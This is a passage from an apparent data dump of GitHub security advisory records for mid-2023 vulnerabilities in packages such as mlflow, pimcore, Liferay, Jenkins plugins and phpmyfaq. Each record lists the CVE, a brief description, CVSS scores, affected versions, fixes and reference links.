[`github.com/ipfs/boxo/bitswap/client`](https://pkg.go.dev/github.com/ipfs/boxo/bitswap/client).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-libipfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '0.6.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-libipfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/security/advisories/GHSA-m974-xj4j-7qv5'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-libipfs/security/advisories/GHSA-m974-xj4j-7qv5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25568'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/commit/62cbac40b96f49e39cd7fedc77ee6b56adce4916'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/commit/9cb5cb54d40b57084d1221ba83b9e6bb3fcc3197'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/boxo/commit/baa748b682fabb21a4c1f7628a8af348d4645974'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/boxo'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:32:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-5wpg-qcmj-48wh,2023-05-17T03:48:24Z,2023-05-16T18:30:16Z,,['CVE-2023-33002'],TestComplete support Plugin vulnerable to stored Cross-site Scripting,"TestComplete support Plugin 2.8.1 and earlier does not escape the TestComplete project name in its test result page. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:TestComplete'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33002'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2892'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:48:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-25fx-3c2q-cq46,2023-05-25T21:32:00Z,2023-05-17T15:48:04Z,,['CVE-2023-2756'],pimcore/customer-management-framework-bundle has SQL Injection vulnerability in Segment Assignment query,"### Impact An administrator user can use the inheritable segments feature to execute his own blind SQL queries. A user with administrator privileges can run any SQL query on database. This can be used to retrieve sensitive data, change database information or any other malicious activity against the database. ### Patches Update to version 3.3.10 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/76df151737b7964ce5169fdf9e27a0ad801757fe.patch ### Workarounds Apply https://github.com/pimcore/customer-data-framework/commit/76df151737b7964ce5169fdf9e27a0ad801757fe.patch manually. ### References https://huntr.dev/bounties/cf398528-819f-456e-88e7-c06d268d3f44/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-25fx-3c2q-cq46'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2756'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/76df151737b7964ce5169fdf9e27a0ad801757fe'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf398528-819f-456e-88e7-c06d268d3f44'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T15:48:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-w6f8-mxf5-4vf8,2023-06-03T00:10:13Z,2023-05-24T18:30:26Z,,['CVE-2023-33948'],Missing authorization in Liferay portal,"The Dynamic Data Mapping module in Liferay Portal 7.4.3.67, and Liferay DXP 7.4 update 67 does not limit Document and Media files which can be downloaded from a Form, which allows remote attackers to download any file from Document and Media via a crafted URL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.67'}, {'fixed': '7.4.3.68'}]}], 'versions': ['7.4.3.67']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33948'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33948'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:53:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-7x94-jx75-3gh6,2023-06-02T22:17:57Z,2023-05-26T18:30:21Z,,['CVE-2023-2817'],Stored cross site scripting in Craft CMS,"A post-authentication stored cross-site scripting vulnerability exists in Craft CMS versions <= 4.4.11. HTML, including script tags can be injected into field names which, when the field is added to a category or section, will trigger when users visit the Categories or Entries pages respectively. This issue was patched in version 4.4.12.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.4.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2817'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/7655e1009ba6cdbfb230e6bb138b775b69fc7bcb'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2023-20'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T21:09:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-g9mr-9xfc-4gf7,2023-05-24T21:53:45Z,2023-05-24T18:30:26Z,,['CVE-2023-33949'],Insecure Default Initialization In Liferay Portal,"In Liferay Portal 7.3.0 and earlier, and Liferay DXP 7.2 and earlier the default configuration does not require users to verify their email address, which allows remote attackers to create accounts using fake email addresses or email addresses which they don't control. The portal property `company.security.strangers.verify` should be set to true.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33949'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33949'}]","{'cwe_ids': ['CWE-1188'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T21:53:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-hjh8-9gxh-cx4x,2023-05-17T03:35:52Z,2023-05-16T18:30:16Z,,['CVE-2023-32997'],Jenkins CAS Plugin Session Fixation vulnerability,"Jenkins CAS Plugin 1.6.2 and earlier does not invalidate the existing session on login. This allows attackers to use social engineering techniques to gain administrator access to Jenkins. CAS Plugin 1.6.3 invalidates the existing session on login.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cas-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32997'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3000'}]","{'cwe_ids': ['CWE-384'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:35:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-x82q-mr23-27jc,2023-05-24T18:04:27Z,2023-05-24T15:30:27Z,,['CVE-2023-33940'],Cross-site scripting in Liferay Portal,"Cross-site scripting (XSS) vulnerability in IFrame type Remote Apps in Liferay Portal 7.4.0 through 7.4.3.30, and Liferay DXP 7.4 before update 31 allows remote attackers to inject arbitrary web script or HTML via the Remote App's IFrame URL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.0'}, {'fixed': '7.4.3.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33940'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33940'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-wjq3-7jxx-whj9,2023-05-18T02:01:53Z,2023-05-17T21:30:22Z,,['CVE-2023-2780'],mlflow Path Traversal vulnerability,mlflow prior to 2.3.0 is vulnerable to path traversal due to a bypass of the fix for CVE-2023-1177.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2780'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2023-69.yaml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689'}]","{'cwe_ids': ['CWE-29'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-18T02:01:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-cpc3-gm2x-mrvp,2023-05-17T03:47:34Z,2023-05-16T18:30:16Z,,['CVE-2023-33004'],Jenkins Tag Profiler Plugin missing permission check,"Jenkins Tag Profiler Plugin 0.2 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to reset profiler statistics. Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:tag-profiler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33004'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3083'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:47:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-wc6j-5g83-xfm6,2023-05-22T21:31:35Z,2023-05-11T03:30:15Z,,['CVE-2023-30172'],mflow vulnerable to directory traversal,A directory traversal vulnerability in the /get-artifact API method of the mlflow platform prior to v2.0.0 allows attackers to read arbitrary files on the server via the path parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0rc0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30172'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/issues/7166'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/pull/7170'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/ac4b697bb0bb8a331944dca63f4235b4bf602ab8'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commits/v2.0.0?after=00c3b0a350a28c25b16fbb7feddb8147a919ce18+69&branch=v2.0.0&qualified_name=refs%2Ftags%2Fv2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2023-70.yaml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:11:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-mq3x-qgwx-3rfw,2023-05-17T18:48:07Z,2023-05-11T20:41:24Z,,['CVE-2023-2629'],Embedding untrusted input inside CSV files leads to Formula Injection/CSV Injection,"### Impact The pimcore application is vulnerable to Formula Injection/CSV Injection via the Firstname, Lastname, Street, Zip & City input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a crafted excel file. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data. ### Patches Update to version 3.3.9 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/4e0105c3a78d20686a0c010faef27d2297b98803.patch ### Workarounds Apply patch https://github.com/pimcore/customer-data-framework/commit/4e0105c3a78d20686a0c010faef27d2297b98803.patch manually. ### References https://huntr.dev/bounties/821ff465-4754-42d1-9376-813c17f16a01/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-mq3x-qgwx-3rfw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2629'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/4e0105c3a78d20686a0c010faef27d2297b98803'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/821ff465-4754-42d1-9376-813c17f16a01'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:41:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-j93v-cx26-2xc4,2023-05-10T21:19:09Z,2023-05-10T06:30:29Z,2023-05-10T21:19:09Z,[],Duplicate Advisory: Cross-site Scripting (XSS) in Predefined Properties delete,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-q7cc-m6jw-m262. This link is maintained to preserve external references. ## Original DescriptionCross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.5.21.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2615'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7a799399e6843cd049e85da27ceb75b78505317f'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/af9c360a-87f8-4e97-a24b-6db675ee942a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T21:19:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-v9rm-7rv9-r3fw,2023-05-22T21:30:33Z,2023-05-12T09:30:15Z,,['CVE-2023-29032'],Apache OpenMeetings Improper Authentication vulnerability,"An attacker that has gained access to certain private information can use this to act as other user. Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 3.1.3 before 7.1.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.3'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29032'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/4e89e0ca076c83f26562f1146cf3e81ba0b16a7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/openmeetings'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OPENMEETINGS-2764'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/j2d6mg3rzcphfd8vvvk09d8p4o9lvnqp'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:17:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-fwj4-72fm-c93g,2023-05-05T02:18:26Z,2023-05-05T02:18:26Z,,[],Under-validated ComSpec and cmd.exe resolution in Mutagen projects,"### Impact Mutagen projects offer shell-based execution functionality. On Windows, the shell is resolved using the standard `%ComSpec%` mechanism, with a fallback to a `%PATH%`-based search for `cmd.exe`. While this is the standard practice on Windows systems, it presents somewhat risky behavior. Firstly, `%ComSpec%` could, in theory, be set maliciously. Unfortunately, there's not much that can be done to prevent this attack surface, because `%ComSpec%` is the official mechanism for shell specification on Windows. We can, however, validate that it points to an absolute path, which one would expect for a properly set value. Secondly, a fallback to a relative `cmd.exe` path, resolved via `%PATH%`, could be risky. The risk is largely mitigated by changes in Go 1.19 and later, but prior to that a malicious `cmd.exe` could been resolved in the current working directory. To mitigate this issue, Mutagen now uses the `%SystemRoot%` environment variable (also validated to be an absolute path) to resolve `cmd.exe` in the event that `%ComSpec%` is not set correctly. ### Patches The problem has been patched in Mutagen v0.16.6 and v0.17.1. Earlier versions of Mutagen are no longer supported and will not be patched. Versions of Mutagen after v0.18.0 will also have the patch merged. ### Workarounds Maintain control of the environment variable settings on your system, in particular the `ComSpec` environment variable. ### References More information on `%ComSpec%` can be found [online](https://en.wikipedia.org/wiki/COMSPEC). More information on Go's `PATH`-based lookup changes can be found [here](https://go.dev/blog/path-security), [here](https://go.dev/doc/go1.19#os-exec-path), and [here](https://github.com/golang/go/issues/43947). A [similar issue](https://github.com/python/cpython/issues/101283) that was addressed within the Python subprocess module also provides additional discussion. ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/mutagen-io/mutagen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mutagen-io/mutagen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.17.0'}, {'fixed': '0.17.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mutagen-io/mutagen/security/advisories/GHSA-fwj4-72fm-c93g'}, {'type': 'PACKAGE', 'url': 'https://github.com/mutagen-io/mutagen'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:18:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-7g2v-2frm-rg94,2023-05-23T22:39:22Z,2023-05-12T09:30:15Z,,['CVE-2023-2515'],Mattermost Incorrect Authorization vulnerability,"Mattermost fails to restrict a user with permissions to edit other users and to create personal access tokens from elevating their privileges to system admin ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.2.0'}, {'fixed': '7.7.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.8.0'}, {'fixed': '7.8.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2515'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost-server'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:17:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-4rhq-vq24-88gw,2023-05-22T20:29:44Z,2023-05-22T20:29:44Z,,['CVE-2021-36154'],Uncontrolled Recursion in HTTP2ToRawGRPCServerCodec,"### Impact Affected gRPC Swift servers are vulnerable to uncontrolled recursion and stack consumption when parsing certain payloads. This may lead to a denial of service. ### Patches The problem has been fixed in 1.2.0. ### Workarounds No workaround is available. Users must upgrade.",[],"[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/grpc/grpc-swift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/security/advisories/GHSA-4rhq-vq24-88gw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36154'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=35274'}, {'type': 'PACKAGE', 'url': 'https://github.com/grpc/grpc-swift'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/releases/tag/1.2.0'}]","{'cwe_ids': ['CWE-674'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T20:29:44Z', 'nvd_published_at': '2021-07-09T12:15:00Z'}" 1.4.0,GHSA-5xq3-7mw9-wj5p,2023-05-11T14:00:53Z,2023-05-05T21:31:11Z,,['CVE-2023-2427'],Cross Site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to version 3.1.13.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2427'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/514f4df2ad918e69575028d58b2e33aaf536e59b'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/89005a6d-d019-4cb7-ae88-486d2d44190d'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T23:13:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-83fm-w79m-64r5,2023-05-01T13:43:58Z,2023-05-01T13:43:58Z,,[],Remote file access vulnerability in `mlflow server` and `mlflow ui` CLIs,"### Impact Users of the MLflow Open Source Project who are hosting the MLflow Model Registry using the ``mlflow server`` or ``mlflow ui`` commands using an MLflow version older than **MLflow 2.3.1** may be vulnerable to a remote file access exploit if they are not limiting who can query their server (for example, by using a cloud VPC, an IP allowlist for inbound requests, or authentication / authorization middleware). This issue only affects users and integrations that run the ``mlflow server`` and ``mlflow ui`` commands. Integrations that do not make use of ``mlflow server`` or ``mlflow ui`` are unaffected; for example, the Databricks Managed MLflow product and MLflow on Azure Machine Learning do not make use of these commands and are not impacted by these vulnerabilities in any way. The vulnerability is very similar to https://nvd.nist.gov/vuln/detail/CVE-2023-1177, and a separate CVE will be published and updated here shortly. ### Patches This vulnerability has been patched in MLflow 2.3.1, which was released to PyPI on April 27th, 2023. If you are using ``mlflow server`` or ``mlflow ui`` with the MLflow Model Registry, we recommend upgrading to MLflow 2.3.1 as soon as possible. ### Workarounds If you are using the MLflow open source ``mlflow server`` or ``mlflow ui`` commands, we strongly recommend limiting who can access your MLflow Model Registry and MLflow Tracking servers using a cloud VPC, an IP allowlist for inbound requests, authentication / authorization middleware, or another access restriction mechanism of your choosing. If you are using the MLflow open source ``mlflow server`` or ``mlflow ui`` commands, we also strongly recommend limiting the remote files to which your MLflow Model Registry and MLflow Tracking servers have access. For example, if your MLflow Model Registry or MLflow Tracking server uses cloud-hosted blob storage for MLflow artifacts, make sure to restrict the scope of your server's cloud credentials such that it can only access files and directories related to MLflow. ### References ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/security/advisories/GHSA-83fm-w79m-64r5'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:43:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-5mf7-p346-7rm8,2023-05-10T15:28:51Z,2023-05-05T21:31:11Z,,['CVE-2023-2550'],Cross Site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to version 3.1.13.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2550'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/20ac51594db11604a4518aacc28a51f67d4f11bf'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/840c8d91-c97e-4116-a9f8-4ab1a38d239b'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T23:14:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-94r7-63g8-c4jw,2023-06-06T01:53:15Z,2023-05-31T03:30:15Z,,['CVE-2023-2999'],thorsten/phpmyfaq vulnerable to cross-site scripting,thorsten/phpmyfaq prior to 3.1.14 is vulnerable to a stored cross-site scripting attack perpetuated by an actor logged in as admin.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.14'}]}]}]","[{'type': 'ADVISORY', 'url': 